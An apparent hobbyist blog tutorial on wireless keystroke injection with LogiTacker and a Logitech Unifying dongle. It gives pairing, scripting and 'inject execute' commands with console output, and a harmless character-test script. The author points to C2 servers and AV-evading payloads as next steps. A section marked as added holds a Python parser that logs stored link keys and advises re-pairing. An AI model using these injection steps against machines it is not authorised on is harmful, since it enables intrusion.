A quick little article about using Logitacker for HID injection, using a transmitter and a dongle, nothing fancy :)
If you read my piece about the Logitacker project, it's time to dive in a little deeper.
So, what is it? It's a small project using Logitech Unifying dongles for payload delivery. You could use something really nice and expensive, or you could DIY on the cheap, using something like Logitacker.
Basically, it's a special dongle that can run scripts, plus a standard Unifying dongle bought from any retail outlet. So, what's it for?
Well, IF we can sniff the pairing process, we can use it for intercepting keystrokes in real time, and injecting our own data back. But we could also use it like a kind of remote RubberDucky, using its scripting system.
That way, we have a normal dongle acting as a keyboard, using drivers already baked into Windows 10, so there should be some fun times ahead ;)
Onward and upwards, let's make this thing work :)
Before we can do anything, we need to pair the dongle and Logitacker. Next up, we store the dongle in LT's memory, so we know where it is, and we define a payload script to test with. Should be fun, right?
First, we set the Logitech dongle in pairing mode, using its administrator software.
Next, we tell Logitacker to pair to it, using
pair device run
It should pair with the dongle, so try a devices list and see if you can see it
LOGITacker (injection) $ devices list
B4:82:ED:A0:09 'unknown name' keyboard: no mouse: yes
class: Logitech Unifying compatible device WPID: 0x0000 dongle WPID: 0x0000
B4:82:ED:A0:0B 'unknown name' keyboard: encrypted mouse: no
class: Logitech Unifying compatible device WPID: 0x0000 dongle WPID: 0x0000
A7:02:9D:25:08 'LOGITacker' keyboard: encrypted mouse: yes
class: Logitech Unifying compatible device WPID: 0x1337 dongle WPID: 0x8802 (Nordic)
link key: 02FDA725BE********637AE0313EF
If you can, great, we're almost ready to rock. Next, we need to set up a script. Mine's just a standard test script I keep around for testing whether all the characters made it through, so I highly suggest you make one like it, for troubleshooting character set problems.
script show
script start
0001: string q w e r t y u i o p
0002: string a s d f g h j k l
0003: string zx c v b n m
0004: string ! # % & / ( ) = ? ` "
0005: string @ $ { [ ] } * ' ; : _ - . ,
script end
LOGITacker (injection) $
When we're done, we need to define a target for injecting, and a language to use. Here are my settings; yours will be different.
inject target <target address>
options inject language da
Plug the Logitech dongle into a Windows workstation, or anything else you might have. Open a text editor, and let go of the keyboard and mouse :)
On the Logitacker attack system, fire the script
inject execute
LOGITacker (injection) $ inject execute
<info> LOGITACKER_PROCESSOR_INJECT: process string injection: q w e r t y u i o p
<info> LOGITACKER: Injection processing resumed
<info> LOGITACKER_PROCESSOR_INJECT: inject task succeeded
<info> LOGITACKER_PROCESSOR_INJECT: process string injection: a s d f g h j k l
<info> LOGITACKER_PROCESSOR_INJECT: inject task succeeded
<info> LOGITACKER_PROCESSOR_INJECT: process string injection: zx c v b n m
<info> LOGITACKER_PROCESSOR_INJECT: inject task succeeded
<info> LOGITACKER_PROCESSOR_INJECT: process string injection: ! # % & / ( ) = ? ` "
<info> LOGITACKER_PROCESSOR_INJECT: inject task succeeded
<info> LOGITACKER_PROCESSOR_INJECT: process string injection: @ $ { [ ] } * ' ; : _ - . ,
<info> LOGITACKER_PROCESSOR_INJECT: inject task succeeded
<info> LOGITACKER_PROCESSOR_INJECT: No more tasks scheduled
<info> LOGITACKER_PROCESSOR_INJECT: script execution succeeded
LOGITacker (injection) $
If all this caused no errors, let's save the config, so we have it.
options store
Or save the dongle settings with
devices storage save <dongle address>
To load them if you have rebooted Logitacker, use
devices storage load <address>
There you go.
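For keeping notes on a lab run, the devices list output shown earlier can be turned into a record that says which devices have a link key stored without copying the key itself. This is an added example, not code from Logitacker or from the original article; it assumes the line layout seen in the listing above, and the addresses and key in the sample are constructed placeholders.

```python
import re

# Constructed sample in the layout of the `devices list` output shown above.
# Addresses and the link key are made-up placeholders, not values from the page.
SAMPLE = """\
LOGITacker (injection) $ devices list
AA:BB:CC:DD:01 'unknown name' keyboard: no mouse: yes
class: Logitech Unifying compatible device WPID: 0x0000 dongle WPID: 0x0000
AA:BB:CC:DD:02 'unknown name' keyboard: encrypted mouse: no
class: Logitech Unifying compatible device WPID: 0x0000 dongle WPID: 0x0000
AA:BB:CC:DD:03 'LOGITacker' keyboard: encrypted mouse: yes
class: Logitech Unifying compatible device WPID: 0x1337 dongle WPID: 0x8802 (Nordic)
link key: 00112233445566778899AABBCCDDEEFF
"""

DEVICE = re.compile(r"^((?:[0-9A-F]{2}:){4}[0-9A-F]{2}) '([^']*)' "
                    r"keyboard: (\S+) mouse: (\S+)$")
WPID = re.compile(r"WPID: (0x[0-9A-Fa-f]{4}) dongle WPID: (0x[0-9A-Fa-f]{4})")

def parse_devices(text):
    """Return one dict per device; the link key itself is never stored."""
    devices = []
    for line in text.splitlines():
        line = line.strip()
        m = DEVICE.match(line)
        if m:
            addr, name, kbd, mouse = m.groups()
            devices.append({"address": addr, "name": name, "keyboard": kbd,
                            "mouse": mouse, "wpid": None, "dongle_wpid": None,
                            "link_key_known": False})
        elif devices and line.startswith("class:"):
            w = WPID.search(line)
            if w:
                devices[-1]["wpid"], devices[-1]["dongle_wpid"] = w.groups()
        elif devices and line.startswith("link key:"):
            devices[-1]["link_key_known"] = True  # record the fact, drop the secret
    return devices

def report(devices):
    """One line per device, safe to paste into notes or a ticket."""
    return [f"{d['address']} {d['name']!r} keyboard={d['keyboard']} "
            f"mouse={d['mouse']} link_key={'stored' if d['link_key_known'] else 'none'}"
            for d in devices]

if __name__ == "__main__":
    print("\n".join(report(parse_devices(SAMPLE))))
```

A device that reports link_key=stored is one whose pairing has been captured, so its dongle should be re-paired before it goes back into regular use.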
Now I leave it up to you to go do something fun with this. Remember, it's a payload delivery system, not a magic bullet. It can only do what you yourself could do from behind the keyboard.
On a normal patched system, using dongles you haven't gotten your hands on, it will require you to sniff out the pairing process. You also have to make a C2 server, AV-evading payloads, and PowerShell scripts yourself for this to be truly effective. But as an alternative to running around with a Bash Bunny, or spending big dollars on a turn-key system, it's a nice toy to have. The possibilities are endless :)